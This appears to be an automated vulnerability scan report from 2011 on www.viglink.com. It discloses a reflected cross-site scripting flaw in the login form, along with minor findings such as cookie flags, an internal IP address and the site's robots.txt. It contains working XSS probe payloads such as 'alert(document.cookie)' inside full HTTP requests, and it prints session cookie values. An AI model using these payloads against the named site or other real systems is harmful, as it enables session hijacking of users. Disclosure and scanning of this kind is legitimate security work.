XSS, CWE-79, CAPEC-86, Cross Site Scripting, www.viglink.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Apr 18 18:56:32 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

2. Cookie without HttpOnly flag set

3. Password field with autocomplete enabled

4. Source code disclosure

5. Email addresses disclosed

6. Private IP addresses disclosed

7. Robots.txt file

8. SSL certificate



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08d"><script>alert(1)</script>c0fa7bd59e7 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 157
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=2b08d"><script>alert(1)</script>c0fa7bd59e7&password=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:46 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=952FC9993B9EFFF81A998BD660CD3386; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5561
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input id="email" name="email" size="30" type="text" value="2b08d"><script>alert(1)</script>c0fa7bd59e7" placeholder="you@example.com"/>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 157
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=&password=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:02 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=3C808A6CC3652C4C5707235115C2E57D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5518
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 157
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=&password=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:02 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=3C808A6CC3652C4C5707235115C2E57D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5518
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
</h2>

<form action="https://www.viglink.com/users/action/login" method="post">
<input type="hidden" name="authRedirect" value=""/>
...[SNIP]...
</label>
<input id="password" name="password" size="30" type="password"/>

<button type="submit">
...[SNIP]...

4. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.viglink.com
Path:   /combined.js.h898114336.pack

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /combined.js.h898114336.pack HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:02 GMT
Cache-Control: private
Expires: Thu, 15 Apr 2021 23:50:02 GMT
ETag: pack898114336
X-Powered-By: pack:tag
Content-Type: text/javascript;charset=utf-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 131335

(function(f,o){function t(){if(!b.isReady){try{A.documentElement.doScroll("left")}catch(a){setTimeout(t,1);return}b.ready()}}function k(a,c){c.src?b.ajax({url:c.src,async:false,dataType:"script"}):b.g
...[SNIP]...
fined"};h.noConflict=function(){f._=o;return this};h.identity=function(i){return i};h.breakLoop=function(){throw k;};var P=0;h.uniqueId=function(i){var q=P++;return i?i+q:q};h.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
.\d*)?(?:[eE][+\-]?\d+)?/g,
"]").replace(/(?:^|:|,)(?:\s*\[)+/g,""))){i=eval("("+r+")");return typeof P==="function"?M({"":i},""):i}throw new SyntaxError("JSON.parse");}})();_.templateSettings={start:"<?",end:"?>",interpolate:/<\?=(.+?)\?>
...[SNIP]...

5. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 157
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=&password=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:02 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=3C808A6CC3652C4C5707235115C2E57D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5518
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<meta property="og:email" content="info@viglink.com"/>
...[SNIP]...
<input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/>
...[SNIP]...

6. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 157
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=&password=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:02 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=3C808A6CC3652C4C5707235115C2E57D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5518
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<!-- Served by: www.viglink.com (10.245.213.194) -->
...[SNIP]...

7. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/action/login

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.viglink.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:50:03 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=E9825F4C09E4430B15C300AF20077A71; Path=/; Secure
Accept-Ranges: bytes
ETag: W/"64-1268787640000"
Last-Modified: Wed, 17 Mar 2010 01:00:40 GMT
Content-Type: text/plain
Content-Length: 64
Vary: Accept-Encoding
Connection: close

# Allow all robots to browse everywhere
User-agent: *
Disallow:

8. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.viglink.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Aug 03 19:37:17 CDT 2010
Valid to:  Fri Sep 18 12:57:17 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Mon Apr 18 18:56:32 CDT 2011.